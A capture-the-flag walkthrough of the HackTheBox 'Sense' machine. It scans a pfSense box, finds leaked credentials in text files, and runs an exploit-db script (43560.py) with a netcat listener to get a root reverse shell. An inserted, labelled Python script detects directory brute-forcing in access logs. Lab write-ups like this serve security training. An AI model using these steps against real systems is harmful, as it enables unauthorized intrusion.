HTB - Sense

Linux | pfSense

Tools For This Room

  • Google

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with username from text file, and default password

  3. Privesc with python script in exploit-db

Scanning & Enumeration

We kick things off with our favorite nmap scan:

  • Nmap

nmap -sV -sC -vv <IP>

We get the following open ports:

  • 80: HTTP

  • 443: HTTPS

We also run a full port scan in the background, but no other open ports are found.

Checking out port 80, we find that we're redirected to HTTPS instead; after accepting the risk of the self-signed certificate, we land on a login page for pfSense:

A quick Google search for the default credentials gives us admin/pfsense. Unfortunately for us, the admin was not lazy and changed those credentials.

  • Gobuster

After performing a standard gobuster scan, we don't find anything of interest. So let's try searching for specific file extensions, which may turn up files the plain directory scan misses. We'll use the "-x" flag to specify the extensions, such as php, txt and jpg. We'll also use the "-k" flag to skip TLS certificate verification, since the site uses a self-signed certificate. Finally, we'll use dirbuster's wordlist:

  • /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

gobuster dir -u https://<IP> -w <wordlist> -x php,txt,jpg -k
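From the other side of the wire, a scan like the one above is very noisy: one client produces a burst of requests, almost all answered 404, with a handful of 200s for files that should never be served anonymously. The following Python script is an added example, not part of the original write-up or of the pfSense project, showing how a defender can pick that pattern out of an ordinary Apache/nginx-style access log. The log lines it processes are constructed sample data, not a capture from this box; the 60-second window, the 404 threshold and the "sensitive path" pattern are assumptions to tune for your own environment.

```python
"""Flag web clients that look like directory brute-forcers and list any
sensitive files they managed to retrieve. Added example; sample log lines
below are constructed, not captured from a real host."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined"/"common" log prefix: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Filenames that should never be reachable by anonymous clients on an appliance.
# Assumption: extend this to match whatever your own webroot must not expose.
SENSITIVE_PATH_RE = re.compile(
    r'(?i)(users?|passw|cred|changelog|backup)\S*\.(txt|bak|old|xml)$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window=timedelta(seconds=60), not_found_threshold=20):
    """Return {ip: finding} for suspicious clients.

    A client is flagged when it produces more than `not_found_threshold` 404s
    inside any `window`-long interval (the brute-force signature), or when it
    successfully (200) fetched a path matching SENSITIVE_PATH_RE (the leak).
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        not_found = [r["ts"] for r in recs if r["status"] == 404]
        # Sliding window over the sorted 404 timestamps: peak count within `window`.
        peak, start = 0, 0
        for end in range(len(not_found)):
            while not_found[end] - not_found[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        leaked = sorted({
            r["path"] for r in recs
            if r["status"] == 200 and SENSITIVE_PATH_RE.search(r["path"])
        })
        if peak > not_found_threshold or leaked:
            findings[ip] = {"peak_404_per_window": peak, "leaked_paths": leaked}
    return findings


# --- constructed sample log: one scanner (10.0.0.5) and one normal user (10.0.0.9) ---
_BASE = datetime(2024, 1, 15, 12, 0, 0, tzinfo=timezone.utc)


def _entry(ip, offset_s, path, status):
    ts = (_BASE + timedelta(seconds=offset_s)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 1234'


SAMPLE_LOG = (
    [_entry("10.0.0.5", i, f"/w{i:03d}.php", 404) for i in range(25)]
    + [_entry("10.0.0.5", 26, "/changelog.txt", 200),
       _entry("10.0.0.5", 27, "/system-users.txt", 200)]
    + [_entry("10.0.0.9", 5, "/index.php", 200),
       _entry("10.0.0.9", 6, "/favicon.ico", 404),
       _entry("10.0.0.9", 9, "/images/logo.jpg", 200)]
)


def run_sample():
    """Run the detector over the constructed log; the scanner is flagged, the user is not."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, finding in run_sample().items():
        print(ip, finding)
```

The 404 burst catches the wordlist run itself; the separate "leaked paths" check is what tells a responder that the scan actually found something (here the two text files), which is the part worth acting on.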

This yields two text files, changelog.txt and system-users.txt. The first text file gives us this:

The second text file drops a username and password hint:

Gaining Foothold

After attempting a few combinations, we get in with rohit/pfsense.

Once logged in, we also have a version number for pfSense (2.1.3). So let's see what exploits we can find:

searchsploit pfsense 2.1.3

We copy it to our working directory with "-m" and inspect it further.

searchsploit -m /usr/share/exploitdb/exploits/php/webapps/43560.py
nano ./43560.py

Privilege Escalation

Opening the Python file, we see what details are required to run it.

But first, let's get a netcat listener up to catch our reverse shell:

nc -lvnp 4443

Now to run the exploit:

python3 <exploit.py> --rhost <victimIP> --lhost <ourIP> --lport <port> --username rohit --password pfsense

We're rewarded with a shell, and it's already root!

Let's grab the user.txt and root.txt and call it a day!

user.txt
root.txt
